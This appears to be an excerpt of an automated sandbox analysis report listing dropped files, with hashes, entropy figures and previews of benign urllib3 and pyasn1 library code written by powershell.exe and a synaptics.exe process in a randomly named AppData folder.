                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-.""".backports.makefile.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``socket.makefile`` method for use with anything that.wants to create a "fake" socket object..""".import io.from socket import SocketIO...def backport_makefile(. self, mode="r", buffering=None, encoding=None, errors=None, newline=None.):. """. Backport of ``socket.makefile`` from Python 3.5.. """. if not set(mode) <= {"r", "w", "b"}:. raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)). writing = "w" in mode. reading = "r" in mode or not writing. assert reading or writing. binary = "b" in mode. rawmode = "". if reading:. rawmode += "r". if writing:. rawmode += "w". raw = SocketIO(self, rawmode). self._makefile_refs += 1. if buffering is None:. buffering = -1. if buffering < 0:. buffering = io.DEFAULT_BUFFER_SIZE. if buffering == 0:. if not binary:. raise ValueError("unbuffered s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19786
                                                                                                                                                                                                            Entropy (8bit):4.580404426519887
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:px0JL44vDADtd76mgTImAmTLmDgDZxp4Butv:pSLPADtd+FTIpSiKxpAutv
                                                                                                                                                                                                            MD5:F54CACFC672E2E917D27555B77BFFB38
                                                                                                                                                                                                            SHA1:C4DF7D527FA82E0330E652F1AC545526E104DA2B
                                                                                                                                                                                                            SHA-256:D0A38E2440A878B6158D41EFBFED21E0EAB7145410DB26FE1678E46E3F2024ED
                                                                                                                                                                                                            SHA-512:A00BAD0858BE856EB4B18DF7F61C99D17346F7B600AF854E1250B18186B944471567833AD102999B8C4AF614414ED6E4D5AD037B2621FAA11026778F921184EE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import collections.import functools.import logging..from ._collections import RecentlyUsedContainer.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme.from .exceptions import (. LocationValueError,. MaxRetryError,. ProxySchemeUnknown,. ProxySchemeUnsupported,. URLSchemeUnknown,.).from .packages import six.from .packages.six.moves.urllib.parse import urljoin.from .request import RequestMethods.from .util.proxy import connection_requires_http_tunnel.from .util.retry import Retry.from .util.url import parse_url..__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]...log = logging.getLogger(__name__)..SSL_KEYWORDS = (. "key_file",. "cert_file",. "cert_reqs",. "ca_certs",. "ssl_version",. "ca_cert_dir",. "ssl_context",. "key_password",. "server_hostname",.)..# All known keyword arguments that could be provided to the pool manager, its.# pools, or the underlying connectio
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5985
                                                                                                                                                                                                            Entropy (8bit):4.441421608164705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:D32cO6oSxdCyJrs0o9JhTEDfmg3zkK7h3dSnPXW4Xdbnr6atK:DGR6oSXCydo9jymgwKtABZr6
                                                                                                                                                                                                            MD5:79224141DF1EEBFB42F87D6F481ACCD6
                                                                                                                                                                                                            SHA1:BD24F3BD1206768F9F7906EBC684B744F49AEC99
                                                                                                                                                                                                            SHA-256:645488A97D02E968B38B179C0A1677FE8932BBB044BF4959BB5553D2CEA1E123
                                                                                                                                                                                                            SHA-512:F47157A8757E58DF43F5E80E1990390CE838C601A0926882FB9A6D39A3901641B68B64122FEF115E53ACE3F1E808A24B99384AA0E1F4A75F33708F5AC76A5A8A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..from .filepost import encode_multipart_formdata.from .packages.six.moves.urllib.parse import urlencode..__all__ = ["RequestMethods"]...class RequestMethods(object):. """. Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body` is for sending requests whose fields are. encoded in the *body* of the request using multipart or www-form-urlencoded. (such as for POST, PUT, PATCH)... :meth:`.request` is for making any kind of request, it will look up the. appropriate encoding format and use one of the above two methods to make. t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30641
                                                                                                                                                                                                            Entropy (8bit):4.264496101925058
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:UbYJr/YVfkk796iiO107J0Q1e+rnS6q0Mq6sQv7bza7igXgPJ:U6Wkk796iXMuQDOR
                                                                                                                                                                                                            MD5:D15DAB20E01038CB65497C6699B7AA5D
                                                                                                                                                                                                            SHA1:B29CB7DE80C225172052A0272684FB2C1DE4DBBF
                                                                                                                                                                                                            SHA-256:7E60C9005906EF5B854E7FAC5524E1D88C345A6717418AA46D18E286FC018D4F
                                                                                                                                                                                                            SHA-512:C41D4D75359CBD31E69950E1C136EEE6A57095F81A9F674481FCA309301E4A9726BFB9E37961E5BF873D4E8E7862C5C39A9C0DB4F29D129991C20B036923B0B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import io.import logging.import sys.import warnings.import zlib.from contextlib import contextmanager.from socket import error as SocketError.from socket import timeout as SocketTimeout..brotli = None..from . import util.from ._collections import HTTPHeaderDict.from .connection import BaseSSLError, HTTPException.from .exceptions import (. BodyNotHttplibCompatible,. DecodeError,. HTTPError,. IncompleteRead,. InvalidChunkLength,. InvalidHeader,. ProtocolError,. ReadTimeoutError,. ResponseNotChunked,. SSLError,.).from .packages import six.from .util.response import is_fp_closed, is_response_to_head..log = logging.getLogger(__name__)...class DeflateDecoder(object):. def __init__(self):. self._first_try = True. self._data = b"". self._obj = zlib.decompressobj().. def __getattr__(self, name):. return getattr(self._obj, name).. def decompress(self, data):. if not data:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4901
                                                                                                                                                                                                            Entropy (8bit):4.618005268693608
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:im6A4yu4N1QdNwwStdwcWTy1IPCSgR4omvom5BoQ/nQo:EquI6cqomvom3/Qo
                                                                                                                                                                                                            MD5:3530B0109675511C483045517D150970
                                                                                                                                                                                                            SHA1:4211CEC45876CD6CB663BF60BB1CE41582D5D098
                                                                                                                                                                                                            SHA-256:E4BC760753D6DBD2B1067D93D3190DD420604416B780654904AA10A11A201159
                                                                                                                                                                                                            SHA-512:3304AEC303CC96C2CC81EB99588AA07A35959BDF0055A816EA9A32DAF9EDDC596C19ED0D72F6C8FAB5ABD0A25171C06A3779A2753D9B50090574E5C3F7D3EE98
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import socket..from ..contrib import _appengine_environ.from ..exceptions import LocationParseError.from ..packages import six.from .wait import NoWayToWaitForSocketError, wait_for_read...def is_connection_dropped(conn): # Platform-specific. """. Returns True if the connection is dropped and should be closed... :param conn:. :class:`http.client.HTTPConnection` object... Note: For platforms like AppEngine, this will always return ``False`` to. let the platform handle connection recycling transparently for us.. """. sock = getattr(conn, "sock", False). if sock is False: # Platform-specific: AppEngine. return False. if sock is None: # Connection already closed (such as by httplib).. return True. try:. # Returns True if readable, which here means it's been dropped. return wait_for_read(sock, timeout=0.0). except NoWayToWaitForSocketError: # Platform-specific: AppEngine. re
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1605
                                                                                                                                                                                                            Entropy (8bit):4.495077395901519
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:FaHRE8L38awee8CfdO2MG89dWysSd2SIv/IBe:OHLMhB8DN1wSIEe
                                                                                                                                                                                                            MD5:6823DF66EC0CB4E27629CFA1CDE0EBDC
                                                                                                                                                                                                            SHA1:86F81687390427C86DA97B882DD7AD2B938275D3
                                                                                                                                                                                                            SHA-256:CD4BCF3C226BA7A74E17437818055B39C97AA3EE2E5CA4AB1A24E492BE6F512E
                                                                                                                                                                                                            SHA-512:D26CCD35B056700DB507BD2FD26ACAB4C3A170CB6C69A0EC6A64CAAF0392DFE3C4B94192460E75D083E6EE664E1915B0A2CC39F1D5AB8D114A37DF3D97E6FE36
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .ssl_ import create_urllib3_context, resolve_cert_reqs, resolve_ssl_version...def connection_requires_http_tunnel(. proxy_url=None, proxy_config=None, destination_scheme=None.):. """. Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). """. # If we're not using a proxy, no way to use a tunnel.. if proxy_url is None:. return False.. # HTTP destinations never require tunneling, we always forward.. if destination_scheme == "http":. return False.. # Support for forwarding with HTTPS proxies and HTTPS destinations.. if (. proxy_url.scheme == "https". and proxy_config. and proxy_config.use_forwarding_for_https. ):. return False.. # Otherwise always use a t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3997
                                                                                                                                                                                                            Entropy (8bit):4.7003873063352435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:PeJqcpzxITTuYQa0ivYufSYzEE3g7wxQLGNotuE3ynoBUAn7Mi6dZvAxcW:WCTCYQ87fSJqSGNpENUAw/lu
                                                                                                                                                                                                            MD5:AA68DA750C53499C3D188288615C1276
                                                                                                                                                                                                            SHA1:DB735E5C86CA859B2AD760B5A06E73DB6DCD6330
                                                                                                                                                                                                            SHA-256:0B4394B76B5C53A2D189027B61834FF46BCFAD2BE5EF388805E910FB99E50599
                                                                                                                                                                                                            SHA-512:1DDFEA531509F486ED19BB2E0060A7EA63E5795CF3D788956A62AC83C9CC9AF375F4B8E400525B5C499AEF4E815F30954854F6F6B9F6BC4087986A7FA3CBEC89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..from base64 import b64encode..from ..exceptions import UnrewindableBodyError.from ..packages.six import b, integer_types..# Pass as a value within ``headers`` to skip.# emitting some HTTP headers that are added automatically..# The only headers that are supported are ``Accept-Encoding``,.# ``Host``, and ``User-Agent``..SKIP_HEADER = "@@@SKIP_HEADER@@@".SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])..ACCEPT_ENCODING = "gzip,deflate".._FAILEDTELL = object()...def make_headers(. keep_alive=None,. accept_encoding=None,. user_agent=None,. basic_auth=None,. proxy_basic_auth=None,. disable_cache=None,.):. """. Shortcuts for generating request headers... :param keep_alive:. If ``True``, adds 'connection: keep-alive' header... :param accept_encoding:. Can be a boolean, list, or string.. ``True`` translates to 'gzip,deflate'.. List will get joined by comma.. String w
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3510
                                                                                                                                                                                                            Entropy (8bit):4.529413035203953
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:PYn1uZLY0GS9PpvNYKzamS7gkLgUCj0bp0FFN1SH8Qnt5JxWCkARhzE6nZwDQ1m8:uuK0HPpv1Nb5MGFU/JOChzB08
                                                                                                                                                                                                            MD5:6EB83504356CF0A5778199247F39E6CA
                                                                                                                                                                                                            SHA1:A3B6DD229AA3B2BE1A4148673A7A68D51EA53024
                                                                                                                                                                                                            SHA-256:189A60DC4822F6A6895D1C01879C2FF8C36E4566A7E4122EE34A117A8C563F6F
                                                                                                                                                                                                            SHA-512:E0B3F698B7AF3098526395E440CBAC30882EEFC5CDB9CAE0FAE166888B9C6546CC67176A1AEE50761E66FD6941A046645CA714A28E4CA09D75569C85A58ED2AB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect..from ..exceptions import HeaderParsingError.from ..packages.six.moves import http_client as httplib...def is_fp_closed(obj):. """. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. """.. try:. # Check `isclosed()` first, in case Python3 doesn't set `closed`.. # GH Issue #928. return obj.isclosed(). except AttributeError:. pass.. try:. # Check via the official file-like-object way.. return obj.closed. except AttributeError:. pass.. try:. # Check if the object is a container for another file-like object that. # gets released on exhaustion (e.g. HTTPResponse).. return obj.fp is None. except AttributeError:. pass.. raise ValueError("Unable to determine whether fp is closed.")...def assert_header_parsi
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                            Entropy (8bit):4.915805429343129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/Pv8uletxbkCoJ1tt/lPlK5jAut+kiE2J5dj/a6iVWrzL1dM4LkcTgM:y/38qetGCoJ1rq+uwkn23h/a/Ardnt
                                                                                                                                                                                                            MD5:FE0897FBAA956DCB5A9D8B9836D8E11A
                                                                                                                                                                                                            SHA1:E6A4F480A7AE8676D2304473249B72E5DD404DAB
                                                                                                                                                                                                            SHA-256:9ABF4E8594217B65230B2E2AE3FAAC1A9898937D23DEA767EB45511C95FCF221
                                                                                                                                                                                                            SHA-512:415C8ADCF974E269E6479855AE7341C95F7FC2EFE90D6DEFDB5D8F8894FD47DE9398676A3EC6DC08B35A663725E5B4F85D03AC587DFBC899C69BE4A8EB89E83C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gB........................@...s....d.Z.d.S.).z.0.6.1N)...__version__..r....r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4134
                                                                                                                                                                                                            Entropy (8bit):4.998095889605159
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xoE//QELK0E+xQk5QMwJ9v9YitXwqiOEsRuUOGnBiw:xHm0XQ1MwzOOFRTBp
                                                                                                                                                                                                            MD5:ED130BC549B9A6EB95239004A30315F0
                                                                                                                                                                                                            SHA1:7FAC9FEFE16BD9AF6D2B0B3E552D76598B066361
                                                                                                                                                                                                            SHA-256:153290F88D46C3F3203B5E03636DBAF02288CB6F432CD8315E9C8643D2B8BD80
                                                                                                                                                                                                            SHA-512:72180CDC20690E333B41CD631ED9D306EF804C4ACA71A872C2AB855BFB281268D6C33EA5D8D32D32AA9A216DAAC46C1567126770E2897E009BF7539B03312B43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.d...Z.i.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.a.d.d...Z.d.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.S.)......N)...__version__)...error)...Debug..setLogger..hexdump..........i....)...none..encoder..decoder..allc....................@...s&...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.)...PrinterNc....................C...sj...|.d.u.r.t...d...}.|...t.j.....|.d.u.r.t.....}.|.d.u.r t...d...}.|...|.....|...t.j.....|...|.....|.|._.d.S.).N..pyasn1z!%(asctime)s %(name)s: %(message)s)...logging..getLogger..setLevel..DEBUG..StreamHandler..Formatter..setFormatter..addHandler.._Printer__logger)...self..logger..handler..formatter..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\debug.py..__init__ ...s..........................z.Printer.__init__c....................C........|.j...|.....d.S...N).r......debug..r......msgr....r....r......__call__2..........z.Printer.__ca
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4103
                                                                                                                                                                                                            Entropy (8bit):4.988892016690328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Bce+V9bNrz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:3qZB9GWKOr+3eId632TjbriH
                                                                                                                                                                                                            MD5:F3CEF834A310016912CDF6A6AC791D38
                                                                                                                                                                                                            SHA1:112383429DEF86F5D9ED4254EDC83EB3ABA4ABD1
                                                                                                                                                                                                            SHA-256:FA4B4E588F10E47EF484F836FE301CF71577B0EFC5BBB21651ACD78843E09C07
                                                                                                                                                                                                            SHA-512:3A12292B57AC8D12A6082C0A24DCB8024E9A654CAA750160689C683668A8A438B290056BDB2AFADE2C0E904DA9B53D455E9A9FFAD3B7BF4D041BE5E48FA0CA25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4103
                                                                                                                                                                                                            Entropy (8bit):4.988892016690328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Bce+V9bNrz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:3qZB9GWKOr+3eId632TjbriH
                                                                                                                                                                                                            MD5:F3CEF834A310016912CDF6A6AC791D38
                                                                                                                                                                                                            SHA1:112383429DEF86F5D9ED4254EDC83EB3ABA4ABD1
                                                                                                                                                                                                            SHA-256:FA4B4E588F10E47EF484F836FE301CF71577B0EFC5BBB21651ACD78843E09C07
                                                                                                                                                                                                            SHA-512:3A12292B57AC8D12A6082C0A24DCB8024E9A654CAA750160689C683668A8A438B290056BDB2AFADE2C0E904DA9B53D455E9A9FFAD3B7BF4D041BE5E48FA0CA25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4103
                                                                                                                                                                                                            Entropy (8bit):4.988892016690328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Bce+V9bNrz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:3qZB9GWKOr+3eId632TjbriH
                                                                                                                                                                                                            MD5:F3CEF834A310016912CDF6A6AC791D38
                                                                                                                                                                                                            SHA1:112383429DEF86F5D9ED4254EDC83EB3ABA4ABD1
                                                                                                                                                                                                            SHA-256:FA4B4E588F10E47EF484F836FE301CF71577B0EFC5BBB21651ACD78843E09C07
                                                                                                                                                                                                            SHA-512:3A12292B57AC8D12A6082C0A24DCB8024E9A654CAA750160689C683668A8A438B290056BDB2AFADE2C0E904DA9B53D455E9A9FFAD3B7BF4D041BE5E48FA0CA25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                            Entropy (8bit):4.660203246760014
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWe3It+kiE2J5dj/a6iVWrzL1A67kcTgp:y/3KCqeh/w7Iwkn23h/a/ArdA6x4
                                                                                                                                                                                                            MD5:986E0FD08B2D69BACA772EDBF2D38B66
                                                                                                                                                                                                            SHA1:10510567B2B5843860EAECAD5E28A0F6B50B3068
                                                                                                                                                                                                            SHA-256:6A62852F8B60B081882DBA7D6F18B5CF8C90353C0C121E03916BA5874925EEE9
                                                                                                                                                                                                            SHA-512:CB034DF55B0F6AD283C698D7E065EF64A75356539D33DCE9CF84F26D9E6C889ECE01875940B542B1BD59340F4FA3423D7AFD697ED114A586AD945C8AD7BE30F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                            Entropy (8bit):4.660203246760014
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWe3It+kiE2J5dj/a6iVWrzL1A67kcTgp:y/3KCqeh/w7Iwkn23h/a/ArdA6x4
                                                                                                                                                                                                            MD5:986E0FD08B2D69BACA772EDBF2D38B66
                                                                                                                                                                                                            SHA1:10510567B2B5843860EAECAD5E28A0F6B50B3068
                                                                                                                                                                                                            SHA-256:6A62852F8B60B081882DBA7D6F18B5CF8C90353C0C121E03916BA5874925EEE9
                                                                                                                                                                                                            SHA-512:CB034DF55B0F6AD283C698D7E065EF64A75356539D33DCE9CF84F26D9E6C889ECE01875940B542B1BD59340F4FA3423D7AFD697ED114A586AD945C8AD7BE30F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5836
                                                                                                                                                                                                            Entropy (8bit):5.282456829331137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W+ZlQBEsXLK7LEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:3LrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                                            MD5:5AD5B3DD76C44AFD7A55B669A5E09056
                                                                                                                                                                                                            SHA1:FE086D34A157CD3097A153E567860F6BD4822FE0
                                                                                                                                                                                                            SHA-256:B9C144EF0AA4714FB8A8222CFF8405B2CA8226E3344BCD445B49E2C321D013BD
                                                                                                                                                                                                            SHA-512:5AD1E004173F8263C74C724276072ECD0670067F240468587EF0713FE5730C8FC10076C645BD7E94120E132446DF02BA6C6E6153C79013FF25D362F4140524FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...sb...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e.j...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......N)...error)...univc....................@...sd...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.e.j.f.d.d...Z.d.d.d...Z.e.d.d.....Z.e.j.d.d.....Z.d.d...Z.d.S.)...CachingStreamWrappera....Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. c....................C...s....|.|._.t.....|._.d.|._.d.S...Nr....)..._raw..io..BytesIO.._cache.._markedPosition)...self..raw..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\streaming.py..__init__....s..........z.CachingStreamWrapper.__init__c....................C...s$...|...|...}.|.j...t.|.....t.j.....|.S...N)...readr......seek..len..os..SEEK_CUR).r......n
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5836
                                                                                                                                                                                                            Entropy (8bit):5.282456829331137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W+ZlQBEsXLK7LEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:3LrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                                            MD5:5AD5B3DD76C44AFD7A55B669A5E09056
                                                                                                                                                                                                            SHA1:FE086D34A157CD3097A153E567860F6BD4822FE0
                                                                                                                                                                                                            SHA-256:B9C144EF0AA4714FB8A8222CFF8405B2CA8226E3344BCD445B49E2C321D013BD
                                                                                                                                                                                                            SHA-512:5AD1E004173F8263C74C724276072ECD0670067F240468587EF0713FE5730C8FC10076C645BD7E94120E132446DF02BA6C6E6153C79013FF25D362F4140524FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
